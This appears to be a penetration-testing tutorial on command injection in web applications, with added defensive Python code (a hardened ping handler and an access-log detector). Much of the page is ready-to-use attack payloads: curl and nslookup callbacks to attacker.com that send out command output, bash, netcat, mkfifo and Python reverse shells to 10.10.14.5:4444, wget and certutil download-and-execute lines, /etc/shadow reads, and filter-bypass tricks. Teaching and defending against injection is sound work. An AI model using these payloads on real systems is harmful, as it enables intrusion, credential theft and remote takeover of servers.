Web Application Attacks
# Command Injection
Command injection allows attackers to execute operating-system commands on the target server. The vulnerability arises when a web application builds a system command from user input and hands the resulting string to a shell without validating or escaping it.
## Understanding Command Injection
Vulnerable code passes user input directly to system commands:

```php
// Vulnerable PHP
$output = shell_exec("ping -c 4 " . $_GET['ip']);
// With input: 127.0.0.1; cat /etc/passwd
// Becomes: ping -c 4 127.0.0.1; cat /etc/passwd
```
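The same ping handler in Python, shown as an added example that is not code from the original page: the first function reproduces the concatenation pattern of the PHP snippet (the string goes to a shell, so `;` in the input starts a second command), and the hardened version rejects anything that does not parse as an IP address and passes the validated value as a single argv element with no shell involved. Function names are hypothetical.

```python
import ipaddress
import subprocess


def build_command_vulnerable(ip: str) -> str:
    """Mirror of the PHP snippet: user input is glued into a command string
    that a shell will parse (shell=True here, shell_exec() in PHP), so an
    operator such as ';' inside the input becomes a second command."""
    return "ping -c 4 " + ip


def run_ping_vulnerable(ip: str) -> str:
    # Kept only to contrast with the hardened version below; do not use.
    return subprocess.run(build_command_vulnerable(ip), shell=True,
                          capture_output=True, text=True).stdout


def is_valid_target(ip: str) -> bool:
    """Allow-list check: the value must parse as an IPv4 or IPv6 address.
    '127.0.0.1; cat /etc/passwd' fails here before any command is built."""
    try:
        ipaddress.ip_address(ip.strip())
    except ValueError:
        return False
    return True


def build_command_safe(ip: str) -> list:
    """Validated input becomes one argv element. With an argument list and
    shell=False no shell ever tokenises the string, so ';', '|', '$()' and
    the other operators are just characters inside the target argument."""
    if not is_valid_target(ip):
        raise ValueError("target must be an IP address")
    return ["ping", "-c", "4", str(ipaddress.ip_address(ip.strip()))]


def run_ping_safe(ip: str) -> str:
    # shell=False is the default; it is spelled out to make the point visible.
    return subprocess.run(build_command_safe(ip), shell=False,
                          capture_output=True, text=True, timeout=30).stdout
```

The two defences are independent and both are worth keeping: the argv list removes the shell from the path entirely, and the allow-list validation stops a hostile value from reaching `ping` at all (a bare argv list would still pass `-f` or another option-looking value through as an argument).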
## Command Injection Operators

### Linux Operators

| Operator | Description | Example |
|---|---|---|
| `;` | Command separator | `; whoami` |
| `&&` | AND (second runs if first succeeds) | `&& whoami` |
| `\|\|` | OR (second runs if first fails) | `\|\| whoami` |
| `\|` | Pipe output | `\| whoami` |
| `` ` `` | Command substitution | `` `whoami` `` |
| `$()` | Command substitution | `$(whoami)` |
| `\n` | Newline | `%0a whoami` |
### Windows Operators

| Operator | Description | Example |
|---|---|---|
| `&` | Command separator | `& whoami` |
| `&&` | AND | `&& whoami` |
| `\|\|` | OR | `\|\| whoami` |
| `\|` | Pipe | `\| whoami` |
## Testing for Command Injection

### Basic Detection

```text
; id
; whoami
& id
&& id
| id
|| id
`id`
$(id)
```
### Blind Command Injection

When output isn't displayed, use time-based detection:

```text
# Linux
; sleep 5
& sleep 5
| sleep 5
$(sleep 5)
# Windows
& ping -n 5 127.0.0.1
| ping -n 5 127.0.0.1
```
### Out-of-Band Detection

```text
# DNS callback (Linux)
; nslookup attacker.com
; curl http://attacker.com/$(whoami)
# DNS callback (Windows)
& nslookup attacker.com
& certutil -urlcache -split -f http://attacker.com/
```
## Exploitation Techniques

### Direct Shell

```text
# Linux reverse shell
; bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
# URL encoded version
%3B%20bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.5%2F4444%200%3E%261'
```
### File Download and Execute

```text
# Linux
; wget http://10.10.14.5/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh
# Windows
& certutil -urlcache -split -f http://10.10.14.5/nc.exe C:\Windows\Temp\nc.exe & C:\Windows\Temp\nc.exe -e cmd.exe 10.10.14.5 4444
```
## Bypassing Filters

### Space Bypass

```bash
# Using $IFS (Internal Field Separator)
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
# Using tabs
cat%09/etc/passwd
# Using brace expansion
{cat,/etc/passwd}
```
### Keyword Bypass

```bash
# Breaking up commands
wh$()oami
wh``oami
who$@ami
# Using variables
a=wh;b=oami;$a$b
# Base64 encoding
echo "d2hvYW1p" | base64 -d | bash
```
### Quote Bypass

```bash
# Single quotes
w'h'o'am'i
# Double quotes
w"h"o"am"i
# Backslash
w\ho\am\i
```
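Reading the operator tables and the filter bypasses above from the defender's side: the following added example (not code from the original page) is a small Python detector that URL-decodes the query parameters in web-server access log lines and flags the operators and bypass tricks listed in this section, including encoded newlines and tabs, `$IFS`, brace expansion, empty substitutions and quote-split keywords. It decodes a second time so that double-encoded values (`%253B`) are caught. The log format, the sample log lines and the function names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators taken from the operator and bypass lists in this section.
# Each entry: (name, regex applied to the fully URL-decoded parameter value).
INDICATORS = [
    ("separator",       re.compile(r"[;\n]")),                 # ; and %0a
    ("and_or",          re.compile(r"&&|\|\|")),               # && and ||
    ("pipe_or_bg",      re.compile(r"[|&]")),                  # | and Windows &
    ("substitution",    re.compile(r"\$\(|`")),                # $( ... ) and backticks
    ("ifs_space",       re.compile(r"\$\{?IFS\}?")),           # $IFS / ${IFS}
    ("brace_expansion", re.compile(r"\{[^{}]*,[^{}]*\}")),     # {cat,/etc/passwd}
    # wh$()oami, wh``oami, who$@ami, w'h'oami, w\ho\ami
    ("keyword_split",   re.compile(r"\$\(\)|``|\$@|\w['\"]\w|\\\w")),
]

# Constructed combined-log-format lines (not real traffic).
LOG_LINES = [
    '10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /ping?ip=127.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /ping?ip=127.0.0.1%3B%20id HTTP/1.1" 200 640',
    '10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /ping?ip=127.0.0.1%0asleep%205 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:04 +0000] "GET /ping?ip=127.0.0.1%26cat%24IFS/etc/passwd HTTP/1.1" 200 900',
    '10.0.0.7 - - [01/Jan/2024:12:00:05 +0000] "GET /ping?ip=127.0.0.1%26%7Bcat,/etc/passwd%7D HTTP/1.1" 200 900',
    '10.0.0.7 - - [01/Jan/2024:12:00:06 +0000] "GET /ping?ip=127.0.0.1%2526%2520w%2527h%2527oami HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:07 +0000] "GET /search?q=cats+and+dogs HTTP/1.1" 200 2048',
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decode(value: str) -> str:
    """Decode twice so a double-encoded payload such as %253B becomes ';'."""
    return unquote_plus(unquote_plus(value))


def classify(value: str) -> list:
    """Return the names of every indicator present in the decoded value."""
    decoded = decode(value)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_access_log(lines) -> list:
    """Yield (line_no, param, decoded_value, indicators) for every query
    parameter that trips at least one indicator."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = LOG_LINE.match(line)
        if not match:
            continue  # not in the expected format; skip rather than guess
        query = urlsplit(match.group("target")).query
        # parse_qsl splits on the raw '&' (as the web server would) and
        # decodes one level; classify() handles any further encoding.
        for param, raw in parse_qsl(query, keep_blank_values=True):
            hits = classify(raw)
            if hits:
                findings.append((line_no, param, decode(raw), hits))
    return findings


if __name__ == "__main__":
    for line_no, param, value, hits in scan_access_log(LOG_LINES):
        print(f"line {line_no}: {param}={value!r} -> {', '.join(hits)}")
```

The `pipe_or_bg` and `keyword_split` indicators fire on legitimate input too (`|` in search terms, apostrophes in names), so treat a hit as a triage signal to be correlated with the response size, the parameter's expected type and the rate per source, not as a verdict; the code-level fix above the detector is what actually closes the hole.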
## Common Vulnerable Functions

### PHP

- `system()`
- `exec()`
- `shell_exec()`
- `passthru()`
- `popen()`
- `proc_open()`
- `pcntl_exec()`

### Python

- `os.system()`
- `os.popen()`
- `subprocess.call()`
- `subprocess.run()`
- `subprocess.Popen()`

### Node.js

- `child_process.exec()`
- `child_process.spawn()`
- `child_process.execSync()`
## Command Injection Payloads

### Linux Enumeration

```text
; id
; whoami
; uname -a
; cat /etc/passwd
; cat /etc/shadow
; ls -la /home
; env
; ps aux
```
### Windows Enumeration

```text
& whoami
& hostname
& ipconfig
& net user
& net localgroup administrators
& systeminfo
& dir C:\Users
```
### Reverse Shell Payloads

```text
# Linux bash
; bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
# Linux netcat
; nc -e /bin/bash 10.10.14.5 4444
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
# Python
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```
## Command Injection Workflow

```text
1. Identify input vectors
   └── Form fields, URL parameters, headers
2. Test with simple operators
   └── ; id, | id, & whoami
3. Check for blind injection
   └── sleep commands, DNS callbacks
4. Bypass filters if needed
   └── Encoding, $IFS, command breaking
5. Escalate to shell
   └── Reverse shell, file upload
```
Next, we'll cover file inclusion vulnerabilities (LFI/RFI).